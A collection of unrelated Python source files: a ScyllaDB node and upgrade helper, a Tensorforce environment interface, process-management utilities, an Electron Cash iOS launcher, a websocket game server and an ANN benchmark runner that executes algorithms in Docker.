'num_tokens': 0,
'partitioner': 0,
'permissions_validity_in_ms': 0,
'phi_convict_threshold': 0,
'range_request_timeout_in_ms': 0,
'read_request_timeout_in_ms': 0,
'request_scheduler': 0,
'request_scheduler_id': 0,
'request_scheduler_options': 0,
'request_timeout_in_ms': 0,
'row_cache_keys_to_save': 0,
'row_cache_save_period': 0,
'row_cache_size_in_mb': 0,
'rpc_address': 0,
'rpc_interface': 0,
'rpc_interface_prefer_ipv6': 0,
'rpc_keepalive': 0,
'rpc_max_threads': 0,
'rpc_min_threads': 0,
'rpc_port': 0,
'rpc_recv_buff_size_in_bytes': 0,
'rpc_send_buff_size_in_bytes': 0,
'rpc_server_type': 0,
'seed_provider': 0,
'server_encryption_options': 0,
'snapshot_before_compaction': 0,
'ssl_storage_port': 0,
'sstable_preemptive_open_interval_in_mb': 0,
'start_native_transport': 0,
'start_rpc': 0,
'storage_port': 0,
'stream_throughput_outbound_megabits_per_sec': 0,
'streaming_socket_timeout_in_ms': 0,
'thrift_framed_transport_size_in_mb': 0,
'tombstone_failure_threshold': 0,
'tombstone_warn_threshold': 0,
'trickle_fsync': 0,
'trickle_fsync_interval_in_kb': 0,
'truncate_request_timeout_in_ms': 0,
'write_request_timeout_in_ms': 0}
cassandra_data = {}
for key in data:
if key in cassandra_conf_items:
cassandra_data[key] = data[key]
with open(cassandra_conf_file, 'w') as f:
yaml.safe_dump(cassandra_data, f, default_flow_style=False)
def __update_yaml_dse(self):
raise NotImplementedError('ScyllaNode.__update_yaml_dse')
def _update_log4j(self):
raise NotImplementedError('ScyllaNode._update_log4j')
def __generate_server_xml(self):
raise NotImplementedError('ScyllaNode.__generate_server_xml')
def _get_directories(self):
dirs = {}
for i in ['data', 'commitlogs', BIN_DIR, 'conf', 'logs', 'hints', 'view_hints']:
dirs[i] = os.path.join(self.get_path(), i)
return dirs
def _copy_agent(self):
raise NotImplementedError('ScyllaNode._copy_agent')
def _start_agent(self):
raise NotImplementedError('ScyllaNode._start_agent')
def _stop_agent(self):
raise NotImplementedError('ScyllaNode._stop_agent')
def _write_agent_address_yaml(self, agent_dir):
raise NotImplementedError('ScyllaNode._write_agent_address_yaml')
def _write_agent_log4j_properties(self, agent_dir):
raise NotImplementedError('ScyllaNode._write_agent_log4j_properties')
def _wait_no_pending_flushes(self, wait_timeout=60):
def no_pending_flushes():
stdout, _ = self.nodetool('cfstats', timeout=wait_timeout)
pending_flushes = False
for line in stdout.splitlines():
line = line.strip()
if line.startswith('Pending flushes'):
_, pending_flushes_str = line.split(':')
pending_flushes_count = int(pending_flushes_str.strip())
if pending_flushes_count > 0:
pending_flushes = True
return not pending_flushes
result = wait_for(no_pending_flushes, timeout=wait_timeout, step=1.0)
if result is None:
raise NodeError("Node %s still has pending flushes after "
"%s seconds" % (self.name, wait_timeout))
def flush(self):
self.nodetool("flush")
self._wait_no_pending_flushes()
def get_node_scylla_version(self, scylla_exec_path=None):
if not scylla_exec_path:
scylla_exec_path = self.get_path()
if not scylla_exec_path.endswith(BIN_DIR):
scylla_exec_path = os.path.join(scylla_exec_path, BIN_DIR)
scylla_exec = os.path.join(scylla_exec_path, 'scylla')
scylla_version = subprocess.run(f"{scylla_exec} --version", shell=True, capture_output=True, text=True)
if scylla_version.returncode:
raise NodeError("Failed to get Scylla version. Error:\n%s" % scylla_version.stderr)
return scylla_version.stdout.strip()
def upgrade(self, upgrade_to_version):
self.upgrader.upgrade(upgrade_version=upgrade_to_version)
class NodeUpgrader:
"""
Node upgrade is supported only when the node uses relocatable packages
"""
def __init__(self, node: ScyllaNode):
"""
:param node: node that should be upgraded/downgraded
"""
self.node = node
self._scylla_version_for_upgrade = None
self.orig_install_dir = node.node_install_dir
self.install_dir_for_upgrade = None
@property
def scylla_version_for_upgrade(self):
return self._scylla_version_for_upgrade
@scylla_version_for_upgrade.setter
def scylla_version_for_upgrade(self, scylla_version_for_upgrade: str):
"""
:param scylla_version_for_upgrade: relocatables name. Example: unstable/master:2020-11-18T08:57:53Z
"""
self._scylla_version_for_upgrade = scylla_version_for_upgrade
def _setup_relocatable_packages(self):
try:
cdir, _ = setup(self.scylla_version_for_upgrade)
except Exception as exc:
raise NodeUpgradeError("Failed to setup relocatable packages. %s" % exc)
return cdir
def _import_executables(self, install_dir):
try:
self.node.node_install_dir = install_dir
self.node.import_bin_files(exist_ok=True, replace=True)
except Exception as exc:
self.node.node_install_dir = self.orig_install_dir
raise NodeUpgradeError("Failed to import executables files. %s" % exc)
def upgrade(self, upgrade_version: str):
"""
:param upgrade_version: relocatables folder. Example: unstable/master:2020-11-18T08:57:53Z
"""
self.scylla_version_for_upgrade = upgrade_version
cdir = self._setup_relocatable_packages()
self.node.stop(wait_other_notice=True)
if self.node.status != Status.DOWN:
raise NodeUpgradeError("Node %s failed to stop before upgrade" % self.node.name)
self._import_executables(cdir)
self.node.clean_runtime_file()
try:
self.node.start(wait_other_notice=True, wait_for_binary_proto=True)
except Exception as exc:
raise NodeUpgradeError("Node %s failed to start after upgrade. Error: %s" % (self.node.name, exc))
if self.node.status != Status.UP:
self.node.node_install_dir = self.orig_install_dir
raise NodeUpgradeError("Node %s failed to start after upgrade" % self.node.name)
self.install_dir_for_upgrade = cdir
self.node.node_scylla_version = self.install_dir_for_upgrade
self.validate_version_after_upgrade()
self.node.upgraded = True
def validate_version_after_upgrade(self):
expected_version = self.node.get_node_scylla_version(self.install_dir_for_upgrade)
if self.node.node_scylla_version != expected_version:
raise NodeUpgradeError("Node hasn't been upgraded. Expected version after upgrade: %s, Got: %s" % (
expected_version, self.node.node_scylla_version))
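# Illustrative usage sketch (not from the original module) of the upgrade flow
# above, assuming `node` is an already-initialized ScyllaNode backed by
# relocatable packages; the version string is a placeholder in the format the
# docstrings describe:
#
#   node.upgrade(upgrade_to_version='unstable/master:2020-11-18T08:57:53Z')
#   assert node.upgraded
#   print(node.get_node_scylla_version(node.upgrader.install_dir_for_upgrade))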
|
environment.py
|
# Copyright 2018 Tensorforce Team. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
import importlib
import json
import os
from threading import Thread
from tensorforce import TensorforceError, util
import tensorforce.environments
class Environment(object):
"""
Tensorforce environment interface.
"""
@staticmethod
def create(environment, **kwargs):
"""
Creates an environment from a specification.
Args:
environment (specification): JSON file, specification key, configuration dictionary,
library module, or `Environment` subclass
(<span style="color:#C00000"><b>required</b></span>).
kwargs: Additional arguments.
"""
if isinstance(environment, Environment):
# TODO: asserts???????
return environment
elif isinstance(environment, dict):
# Dictionary specification
util.deep_disjoint_update(target=kwargs, source=environment)
environment = kwargs.pop('environment', kwargs.pop('type', 'default'))
assert environment is not None
return Environment.create(environment=environment, **kwargs)
elif isinstance(environment, str):
if os.path.isfile(environment):
# JSON file specification
with open(environment, 'r') as fp:
environment = json.load(fp=fp)
util.deep_disjoint_update(target=kwargs, source=environment)
environment = kwargs.pop('environment', kwargs.pop('type', 'default'))
assert environment is not None
return Environment.create(environment=environment, **kwargs)
elif '.' in environment:
# Library specification
library_name, module_name = environment.rsplit('.', 1)
library = importlib.import_module(name=library_name)
environment = getattr(library, module_name)
environment = environment(**kwargs)
assert isinstance(environment, Environment)
return environment
else:
# Keyword specification
environment = tensorforce.environments.environments[environment](**kwargs)
assert isinstance(environment, Environment)
return environment
else:
assert False
def __init__(self):
# first two arguments, if applicable: level, visualize=False
self.observation = None
self.thread = None
def __str__(self):
return self.__class__.__name__
def states(self):
"""
Returns the state space specification.
Returns:
specification: Arbitrarily nested dictionary of state descriptions with the following
attributes:
<ul>
<li><b>type</b> (<i>"bool" | "int" | "float"</i>) – state data type
(<span style="color:#00C000"><b>default</b></span>: "float").</li>
<li><b>shape</b> (<i>int | iter[int]</i>) – state shape
(<span style="color:#C00000"><b>required</b></span>).</li>
<li><b>num_states</b> (<i>int > 0</i>) – number of discrete state values
(<span style="color:#C00000"><b>required</b></span> for type "int").</li>
<li><b>min_value/max_value</b> (<i>float</i>) – minimum/maximum state value
(<span style="color:#00C000"><b>optional</b></span> for type "float").</li>
</ul>
"""
raise NotImplementedError
def actions(self):
"""
Returns the action space specification.
Returns:
specification: Arbitrarily nested dictionary of action descriptions with the following
attributes:
<ul>
<li><b>type</b> (<i>"bool" | "int" | "float"</i>) – action data type
(<span style="color:#C00000"><b>required</b></span>).</li>
<li><b>shape</b> (<i>int > 0 | iter[int > 0]</i>) – action shape
(<span style="color:#00C000"><b>default</b></span>: scalar).</li>
<li><b>num_actions</b> (<i>int > 0</i>) – number of discrete action values
(<span style="color:#C00000"><b>required</b></span> for type "int").</li>
<li><b>min_value/max_value</b> (<i>float</i>) – minimum/maximum action value
(<span style="color:#00C000"><b>optional</b></span> for type "float").</li>
</ul>
"""
raise NotImplementedError
def max_episode_timesteps(self):
"""
Returns the maximum number of timesteps per episode.
Returns:
int: Maximum number of timesteps per episode.
"""
return None
def close(self):
"""
Closes the environment.
"""
if self.thread is not None:
self.thread.join()
self.observation = None
self.thread = None
def reset(self):
"""
Resets the environment to start a new episode.
Returns:
dict[state]: Dictionary containing initial state(s) and auxiliary information.
"""
raise NotImplementedError
# if self.observation is not None or self.thread is not None:
# raise TensorforceError(message="Invalid execute.")
# self.start_reset()
# self.thread.join()
# states, _, _ = self.observe()
# if self.observation is not None:
# raise TensorforceError(message="Invalid start_reset/observe implementation.")
# return states
def execute(self, actions):
"""
Executes the given action(s) and advances the environment by one step.
Args:
actions (dict[action]): Dictionary containing action(s) to be executed
(<span style="color:#C00000"><b>required</b></span>).
Returns:
((dict[state], bool | 0 | 1 | 2, float)): Dictionary containing next state(s), whether
a terminal state is reached or 2 if the episode was aborted, and observed reward.
"""
raise NotImplementedError
# if self.observation is not None or self.thread is not None:
# raise TensorforceError(message="Invalid execute.")
# self.start_execute(actions=actions)
# self.thread.join()
# observation = self.observe()
# if self.observation is not None:
# raise TensorforceError(message="Invalid start_execute/observe implementation.")
# return observation
def start_reset(self):
if self.thread is not None:
raise TensorforceError(message="Invalid start_reset.")
self.thread = Thread(target=self.finish_reset)
self.thread.start()
def finish_reset(self):
self.observation = (self.reset(), None, None)
self.thread = None
def start_execute(self, actions):
if self.observation is not None or self.thread is not None:
raise TensorforceError(message="Invalid start_execute.")
self.thread = Thread(target=self.finish_execute, kwargs=dict(actions=actions))
self.thread.start()
def finish_execute(self, actions):
self.observation = self.execute(actions=actions)
self.thread = None
def retrieve_execute(self):
if self.thread is not None:
return None
else:
if self.observation is None:
raise TensorforceError(message="Invalid retrieve_execute.")
observation = self.observation
self.observation = None
return observation
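# A minimal sketch (not part of Tensorforce) of how the threaded
# start_execute()/retrieve_execute() pattern above is meant to be used.
# CountdownEnvironment is a hypothetical toy environment defined here only for
# illustration.
if __name__ == '__main__':
    import time

    class CountdownEnvironment(Environment):
        def __init__(self, start=3):
            super().__init__()
            self.start = start
            self.counter = start

        def states(self):
            return dict(type='int', shape=(), num_states=self.start + 1)

        def actions(self):
            return dict(type='bool', shape=())

        def reset(self):
            self.counter = self.start
            return self.counter

        def execute(self, actions):
            self.counter -= 1
            terminal = self.counter <= 0
            reward = 1.0 if terminal else 0.0
            return self.counter, terminal, reward

    env = CountdownEnvironment()
    env.reset()
    env.start_execute(actions=True)
    observation = env.retrieve_execute()
    while observation is None:  # poll until the worker thread has stored the result
        time.sleep(0.001)
        observation = env.retrieve_execute()
    print('states, terminal, reward:', observation)
    env.close()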
|
process.py
|
"""System process utilities module."""
import time
import psutil
import warnings
import subprocess
import platform
import threading
import functools
from .timing import get_sleeper, exponential_interval
from testplan.common.utils.logger import TESTPLAN_LOGGER
def _log_proc(msg, warn=False, output=None):
if output is not None:
try:
output.write("{}{}".format(msg, "\n"))
except:
pass
if warn:
warnings.warn(msg)
def kill_process(proc, timeout=5, signal_=None, output=None):
"""
If alive, kills the process.
First call ``terminate()`` or pass ``signal_`` if specified
to terminate for up to time specified in timeout parameter.
If process hangs then call ``kill()``.
:param proc: process to kill
:type proc: ``subprocess.Popen``
:param timeout: timeout in seconds, defaults to 5 seconds
:type timeout: ``int``
:param output: Optional file like object for writing logs.
:type output: ``file``
:return: Exit code of process
:rtype: ``int`` or ``NoneType``
"""
_log = functools.partial(_log_proc, output=output)
retcode = proc.poll()
if retcode is not None:
return retcode
child_procs = psutil.Process(proc.pid).children(recursive=True)
if signal_ is not None:
proc.send_signal(signal_)
else:
proc.terminate()
sleeper = get_sleeper((0.05, 1), timeout=timeout)
while next(sleeper):
if retcode is None:
retcode = proc.poll()
else:
break
if retcode is None:
try:
_log(msg="Binary still alive, killing it")
proc.kill()
proc.wait()
except (RuntimeError, OSError) as error:
_log(msg="Could not kill process - {}".format(error), warn=True)
_, alive = psutil.wait_procs(child_procs, timeout=timeout)
for p in alive:
try:
p.kill()
except psutil.NoSuchProcess:
pass # already dead
except Exception as exc:
_log(
msg="While terminating child process - {}".format(exc),
warn=True,
)
return proc.returncode
def kill_process_psutil(proc, timeout=5, signal_=None, output=None):
"""
If alive, kills the process (an instance of ``psutil.Process``).
    Tries to kill the child processes first and then the process itself.
First call ``terminate()`` or pass ``signal_`` if specified
to terminate for up to time specified in timeout parameter.
If process hangs then call ``kill()``.
:param proc: process to kill
:type proc: ``psutil.Process``
:param timeout: timeout in seconds, defaults to 5 seconds
:type timeout: ``int``
:param output: Optional file like object for writing logs.
:type output: ``file``
:return: List of processes which are still alive
    :rtype: ``list`` of ``psutil.Process``
"""
_log = functools.partial(_log_proc, output=output)
try:
all_procs = proc.children(recursive=True) + [proc]
except psutil.NoSuchProcess:
return []
try:
if signal_ is not None:
proc.send_signal(signal_)
else:
proc.terminate()
except psutil.NoSuchProcess:
pass # already dead
except Exception as exc:
_log(msg="While terminating process - {}".format(exc), warn=True)
_, alive = psutil.wait_procs(all_procs, timeout=timeout)
if len(alive) > 0:
for p in alive:
try:
p.kill()
except psutil.NoSuchProcess:
pass # already dead
except Exception as exc:
_log(msg="Could not kill process - {}".format(exc), warn=True)
_, alive = psutil.wait_procs(alive, timeout=timeout)
return alive
DEFAULT_CLOSE_FDS = platform.system() != "Windows"
def subprocess_popen(
args,
bufsize=0, # unbuffered (`io.DEFAULT_BUFFER_SIZE` for Python 3 by default)
executable=None,
stdin=None,
stdout=None,
stderr=None,
preexec_fn=None,
close_fds=DEFAULT_CLOSE_FDS,
shell=False,
cwd=None,
env=None,
universal_newlines=False,
startupinfo=None,
creationflags=0,
):
"""
    Wrapper for subprocess.Popen, which defaults close_fds=True on non-Windows
    platforms. That is the behaviour we nearly always want, and it became the
    default in Python 3.2+. On Windows, close_fds defaults to False.
"""
if isinstance(args, list):
for idx, arg in enumerate(args):
args[idx] = str(arg)
try:
handle = subprocess.Popen(
args,
bufsize=bufsize,
executable=executable,
stdin=stdin,
stdout=stdout,
stderr=stderr,
preexec_fn=preexec_fn,
close_fds=close_fds,
shell=shell,
cwd=cwd,
env=env,
universal_newlines=universal_newlines,
startupinfo=startupinfo,
creationflags=creationflags,
)
return handle
except:
print("subprocess.Popen failed, args: `{}`".format(args))
raise
def execute_cmd(
cmd,
label=None,
check=True,
stdout=None,
stderr=None,
logger=None,
env=None,
):
"""
Execute a subprocess command.
:param cmd: Command to execute - list of parameters.
:param label: Optional label for debugging
:param check: When True, check that the return code of the command is 0 to
ensure success - raises a RuntimeError otherwise. Defaults to
True - should be explicitly disabled for commands that may
legitimately return non-zero return codes.
:param stdout: Optional file-like object to redirect stdout to.
:param stderr: Optional file-like object to redirect stderr to.
:param logger: Optional logger object as logging destination.
:param env: Optional dict object as environment variables.
:return: Return code of the command.
"""
if not logger:
logger = TESTPLAN_LOGGER
if isinstance(cmd, list):
cmd = [str(a) for a in cmd]
cmd_string = " ".join(cmd) # for logging, easy to copy and execute
else:
cmd_string = cmd
if not label:
label = hash(cmd_string) % 1000
if stdout is None:
stdout = subprocess.PIPE
if stderr is None:
stderr = subprocess.PIPE
logger.debug("Executing command [%s]: '%s'", label, cmd_string)
start_time = time.time()
handler = subprocess.Popen(cmd, stdout=stdout, stderr=stderr, env=env)
stdout, stderr = handler.communicate()
elapsed = time.time() - start_time
if handler.returncode != 0:
logger.debug(
"Failed executing command [%s] after %.2f sec.", label, elapsed
)
if stdout:
logger.debug("Stdout:\n%s", stdout)
if stderr:
logger.debug("Stderr:\n%s", stderr)
if check:
raise RuntimeError(
"Command '{}' returned with non-zero exit code {}".format(
cmd_string, handler.returncode
)
)
else:
logger.debug("Command [%s] finished in %.2f sec", label, elapsed)
return handler.returncode
def enforce_timeout(process, timeout=1, callback=None, output=None):
_log = functools.partial(_log_proc, output=output)
def _inner():
begin = time.time()
intervals = exponential_interval(maximum=10)
while True:
if process.returncode is not None:
_log(msg="Process returncode: {}".format(process.returncode))
break
elif time.time() - begin >= timeout:
_log(
msg="Killing binary after"
" reaching timeout value {}s".format(timeout)
)
try:
if callback:
callback()
finally:
kill_process(process, output=output)
break
else:
delay = next(intervals)
_log(msg="Sleeping for {}".format(delay))
time.sleep(delay)
_log("Exiting loop")
timeout_checker = threading.Thread(target=_inner)
timeout_checker.daemon = True
timeout_checker.start()
return timeout_checker
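# A minimal sketch showing how the helpers above fit together: spawn a
# long-running child with subprocess_popen(), arm enforce_timeout() so that it
# gets killed after roughly one second, then read its exit status. The child
# command is an arbitrary choice for illustration (any long-running process
# would do).
if __name__ == "__main__":
    import sys

    child = subprocess_popen([sys.executable, "-c", "import time; time.sleep(30)"])
    watchdog = enforce_timeout(child, timeout=1, output=sys.stdout)
    watchdog.join()  # the watchdog thread exits once it has killed the child
    print("child exit code:", child.poll())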
|
decorators.py
|
from threading import Thread
# ``async`` became a reserved keyword in Python 3.7, so the decorator is named
# run_async here to keep the module importable on current interpreters.
def run_async(f):
    def wrapper(*args, **kwargs):
        thr = Thread(target=f, args=args, kwargs=kwargs)
        thr.start()
        return thr  # return the thread so callers can join() it if needed
    return wrapper
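# A minimal usage sketch for the decorator above: the decorated function runs
# in a background thread and the returned Thread can be joined by the caller.
if __name__ == "__main__":
    import time

    @run_async
    def slow_greeting(name):
        time.sleep(0.1)
        print("hello,", name)

    worker = slow_greeting("world")
    worker.join()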
|
app.py
|
#
# This file is:
# Copyright (C) 2018 Calin Culianu <calin.culianu@gmail.com>
#
# MIT License
#
import os
from electroncash_gui.ios_native.monkeypatches import MonkeyPatches
from electroncash.util import set_verbosity
from electroncash_gui.ios_native import ElectrumGui
from electroncash_gui.ios_native.utils import call_later, get_user_dir, cleanup_tmp_dir, is_debug_build, NSLogSuppress, NSLog
from electroncash.simple_config import SimpleConfig
from electroncash.networks import set_mainnet, set_testnet
# NB: This is called from appdelegate.py "application_didFinishLaunchingWithOptions_"
def main():
cleanup_tmp_dir()
config_options = {
'verbose': is_debug_build(),
'cmd': 'gui',
'gui': 'ios_native',
'cwd': os.getcwd(),
        'whitelist_servers_only' : True, # on iOS we force the whitelist ('preferred') servers only, for now, as a security measure
'testnet': 'EC_TESTNET' in os.environ, # You can set the env when testing using Xcode "Scheme" editor
}
if config_options.get('testnet'):
set_testnet()
else:
set_mainnet()
set_verbosity(config_options.get('verbose'), timestamps=False, thread_id=False)
NSLogSuppress(not config_options.get('verbose'))
MonkeyPatches.patch()
config = SimpleConfig(config_options, read_user_dir_function = get_user_dir)
gui = ElectrumGui(config)
call_later(0.010, gui.main) # this is required for the activity indicator to actually animate. Switch to a direct call if not using activity indicator on Splash2
_printStats(config_options) # Prints some startup/debug stats such as Python version and SSL version (this is done in another thread to hopefully not impact startup overhead too much, as importing ssl may be a bit heavy)
return "Bitcoin Cash FTW!"
def _printStats(config_options):
import threading
def thrdfunc(config_options):
# lazy init of SSL
import ssl, sys
from electroncash import version, ecc_fast, schnorr
NSLog("Electron Cash lib version: %s (using server protocol: %s)", version.PACKAGE_VERSION, version.PROTOCOL_VERSION)
NSLog("Python version: %s", ' '.join(sys.version.split('\n')))
NSLog("OpenSSL version: %s", ssl.OPENSSL_VERSION)
NSLog("Fast ECC: %s Fast Schnorr: %s", str(ecc_fast.is_using_fast_ecc()), str(schnorr.has_fast_sign()))
#NSLog("Environment Vars:")
#for k,v in os.environ.copy().items():
# NSLog("%s=%s", str(k), str(v))
#NSLog("Config Vars:")
#for k,v in config_options.copy().items():
# NSLog("config[%s] = %s", str(k), str(v))
# /
# We do this from a thread so as to not delay app startup by importing more stuff we don't strictly need.
threading.Thread(target=thrdfunc, args=(config_options,), daemon=True).start()
|
websocket.py
|
from pdb import set_trace as T
import numpy as np
from signal import signal, SIGINT
import sys, os, json, pickle, time
import threading
from twisted.internet import reactor
from twisted.internet.task import LoopingCall
from twisted.python import log
from twisted.web.server import Site
from twisted.web.static import File
from autobahn.twisted.websocket import WebSocketServerFactory, \
WebSocketServerProtocol
from autobahn.twisted.resource import WebSocketResource
class GodswordServerProtocol(WebSocketServerProtocol):
def __init__(self):
super().__init__()
print("Created a server")
self.frame = 0
#"connected" is already used by WSSP
self.sent_environment = False
self.isConnected = False
self.pos = [0, 0]
self.cmd = None
def onOpen(self):
print("Opened connection to server")
def onClose(self, wasClean, code=None, reason=None):
self.isConnected = False
print('Connection closed')
def connectionMade(self):
super().connectionMade()
self.factory.clientConnectionMade(self)
def connectionLost(self, reason):
super().connectionLost(reason)
self.factory.clientConnectionLost(self)
self.sent_environment = False
#Not used without player interaction
def onMessage(self, packet, isBinary):
print("Server packet", packet)
packet = packet.decode()
        _, packet = packet.split(';')  # Strip header
r, c, cmd = packet.split(' ') #Split camera coords
if len(cmd) == 0 or cmd == '\t':
cmd = None
self.pos = [int(r), int(c)]
self.cmd = cmd
self.isConnected = True
def onConnect(self, request):
print("WebSocket connection request: {}".format(request))
realm = self.factory.realm
self.realm = realm
self.frame += 1
def serverPacket(self):
data = self.realm.packet
return data
def sendUpdate(self, data):
packet = {}
packet['resource'] = data['resource']
packet['player'] = data['player']
packet['npc'] = data['npc']
packet['pos'] = data['pos']
packet['wilderness'] = data['wilderness']
print('Is Connected? : {}'.format(self.isConnected))
if not self.sent_environment:
packet['map'] = data['environment']
packet['border'] = data['border']
packet['size'] = data['size']
if 'overlay' in data:
packet['overlay'] = data['overlay']
print('SENDING OVERLAY: ', len(packet['overlay']))
packet = json.dumps(packet).encode('utf8')
self.sendMessage(packet, False)
class WSServerFactory(WebSocketServerFactory):
def __init__(self, ip, realm):
super().__init__(ip)
self.realm = realm
self.time = time.time()
self.clients = []
self.pos = [0, 0]
self.cmd = None
self.tickRate = 0.6
self.tick = 0
def update(self, packet):
self.tick += 1
uptime = np.round(self.tickRate*self.tick, 1)
delta = time.time() - self.time
print('Wall Clock: ', str(delta)[:5], 'Uptime: ', uptime, ', Tick: ', self.tick)
delta = self.tickRate - delta
if delta > 0:
time.sleep(delta)
self.time = time.time()
for client in self.clients:
client.sendUpdate(packet)
if client.pos is not None:
self.pos = client.pos
self.cmd = client.cmd
return self.pos, self.cmd
def clientConnectionMade(self, client):
self.clients.append(client)
def clientConnectionLost(self, client):
self.clients.remove(client)
class Application:
def __init__(self, realm):
signal(SIGINT, self.kill)
log.startLogging(sys.stdout)
port = 8080
self.factory = WSServerFactory(u'ws://localhost:{}'.format(port), realm)
self.factory.protocol = GodswordServerProtocol
resource = WebSocketResource(self.factory)
root = File(".")
root.putChild(b"ws", resource)
site = Site(root)
reactor.listenTCP(port, site)
def run():
reactor.run(installSignalHandlers=0)
threading.Thread(target=run).start()
def update(self, packet):
return self.factory.update(packet)
def kill(*args):
print("Killed by user")
reactor.stop()
os._exit(0)
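# A minimal usage sketch (not part of the original module): the server only
# needs a "realm" object exposing a ``packet`` attribute; DummyRealm below is a
# hypothetical stand-in for illustration. The loop runs until interrupted (the
# SIGINT handler installed by Application stops the reactor), and port 8080
# must be free.
if __name__ == '__main__':
    class DummyRealm:
        def __init__(self):
            self.packet = {
                'resource': [], 'player': {}, 'npc': {}, 'pos': [0, 0],
                'wilderness': 0, 'environment': [], 'border': 0, 'size': 0,
            }

    realm = DummyRealm()
    app = Application(realm)
    while True:
        pos, cmd = app.update(realm.packet)
        print('camera:', pos, 'command:', cmd)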
|
runner.py
|
from __future__ import print_function
__true_print = print
import argparse
import datetime
import docker
import json
import multiprocessing.pool
import numpy
import os
import psutil
import requests
import sys
import threading
import time
def print(*args, **kwargs):
__true_print(*args, **kwargs)
sys.stdout.flush()
from ann_benchmarks.datasets import get_dataset, DATASETS
from ann_benchmarks.algorithms.definitions import Definition, instantiate_algorithm
from ann_benchmarks.distance import metrics
from ann_benchmarks.results import store_results
def run_individual_query(algo, X_train, X_test, distance, count, run_count, use_batch_query):
best_search_time = float('inf')
for i in range(run_count):
print('Run %d/%d...' % (i+1, run_count))
        n_items_processed = [0]  # a bit awkward, but it can't be a plain scalar because of Python's scoping rules
def single_query(v):
start = time.time()
candidates = algo.query(v, count)
total = (time.time() - start)
candidates = [(int(idx), float(metrics[distance]['distance'](v, X_train[idx])))
for idx in candidates]
n_items_processed[0] += 1
if n_items_processed[0] % 1000 == 0:
print('Processed %d/%d queries...' % (n_items_processed[0], X_test.shape[0]))
if len(candidates) > count:
                print('warning: algorithm %s returned %d results, but count is only %d' % (algo, len(candidates), count))
return (total, candidates)
def batch_query(X):
start = time.time()
            results = algo.batch_query(X, count)
total = (time.time() - start)
candidates = [[(int(idx), float(metrics[distance]['distance'](v, X_train[idx])))
for idx in single_results]
for v, single_results in zip(X, results)]
return [(total / float(len(X)), v) for v in candidates]
if use_batch_query:
results = batch_query(X_test)
else:
results = [single_query(x) for x in X_test]
total_time = sum(time for time, _ in results)
total_candidates = sum(len(candidates) for _, candidates in results)
search_time = total_time / len(X_test)
avg_candidates = total_candidates / len(X_test)
best_search_time = min(best_search_time, search_time)
verbose = hasattr(algo, "query_verbose")
attrs = {
"batch_mode": use_batch_query,
"best_search_time": best_search_time,
"candidates": avg_candidates,
"expect_extra": verbose,
"name": str(algo),
"run_count": run_count,
"distance": distance,
"count": int(count)
}
return (attrs, results)
def run(definition, dataset, count, run_count=3, use_batch_query=False):
algo = instantiate_algorithm(definition)
assert not definition.query_argument_groups \
or hasattr(algo, "set_query_arguments"), """\
error: query argument groups have been specified for %s.%s(%s), but the \
algorithm instantiated from it does not implement the set_query_arguments \
function""" % (definition.module, definition.constructor, definition.arguments)
D = get_dataset(dataset)
X_train = numpy.array(D['train'])
X_test = numpy.array(D['test'])
distance = D.attrs['distance']
print('got a train set of size (%d * %d)' % X_train.shape)
print('got %d queries' % len(X_test))
try:
t0 = time.time()
index_size_before = algo.get_index_size("self")
algo.fit(X_train)
build_time = time.time() - t0
index_size = algo.get_index_size("self") - index_size_before
print('Built index in', build_time)
print('Index size: ', index_size)
query_argument_groups = definition.query_argument_groups
# Make sure that algorithms with no query argument groups still get run
# once by providing them with a single, empty, harmless group
if not query_argument_groups:
query_argument_groups = [[]]
for pos, query_arguments in enumerate(query_argument_groups, 1):
print("Running query argument group %d of %d..." %
(pos, len(query_argument_groups)))
if query_arguments:
algo.set_query_arguments(*query_arguments)
descriptor, results = run_individual_query(algo, X_train, X_test,
distance, count, run_count, use_batch_query)
descriptor["build_time"] = build_time
descriptor["index_size"] = index_size
descriptor["algo"] = definition.algorithm
descriptor["dataset"] = dataset
store_results(dataset,
count, definition, query_arguments, descriptor, results)
finally:
algo.done()
def run_from_cmdline():
parser = argparse.ArgumentParser()
parser.add_argument(
'--dataset',
choices=DATASETS.keys(),
required=True)
parser.add_argument(
'--algorithm',
required=True)
parser.add_argument(
'--module',
required=True)
parser.add_argument(
'--constructor',
required=True)
parser.add_argument(
'--count',
required=True,
type=int)
parser.add_argument(
'--runs',
required=True,
type=int)
parser.add_argument(
'build')
parser.add_argument(
'queries',
nargs='*',
default=[])
args = parser.parse_args()
algo_args = json.loads(args.build)
query_args = [json.loads(q) for q in args.queries]
definition = Definition(
algorithm=args.algorithm,
docker_tag=None, # not needed
module=args.module,
constructor=args.constructor,
arguments=algo_args,
query_argument_groups=query_args,
disabled=False
)
run(definition, args.dataset, args.count, args.runs)
def run_docker(definition, dataset, count, runs, timeout=5*3600, mem_limit=None):
    import colors  # imported lazily; it does not seem to work under Python 2
cmd = ['--dataset', dataset,
'--algorithm', definition.algorithm,
'--module', definition.module,
'--constructor', definition.constructor,
'--runs', str(runs),
'--count', str(count)]
cmd.append(json.dumps(definition.arguments))
cmd += [json.dumps(qag) for qag in definition.query_argument_groups]
print('Running command', cmd)
client = docker.from_env()
if mem_limit is None:
mem_limit = psutil.virtual_memory().available
print('Memory limit:', mem_limit)
container = client.containers.run(
definition.docker_tag,
cmd,
volumes={
os.path.abspath('ann_benchmarks'): {'bind': '/home/app/ann_benchmarks', 'mode': 'ro'},
os.path.abspath('data'): {'bind': '/home/app/data', 'mode': 'ro'},
os.path.abspath('results'): {'bind': '/home/app/results', 'mode': 'rw'},
},
mem_limit=mem_limit,
cpuset_cpus='0', # limit to the 1st CPU
detach=True)
def stream_logs():
for line in container.logs(stream=True):
print(colors.color(line.decode().rstrip(), fg='blue'))
if sys.version_info >= (3, 0):
t = threading.Thread(target=stream_logs, daemon=True)
else:
t = threading.Thread(target=stream_logs)
t.daemon = True
t.start()
try:
exit_code = container.wait(timeout=timeout)
        # Exit cleanly if the container finished successfully
if exit_code == 0:
return
elif exit_code is not None:
print(colors.color(container.logs().decode(), fg='red'))
raise Exception('Child process raised exception %d' % exit_code)
finally:
container.remove(force=True)
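# Illustrative (hypothetical) invocation of run_from_cmdline(); the entry-point
# script name and argument values are placeholders, but the flags mirror the
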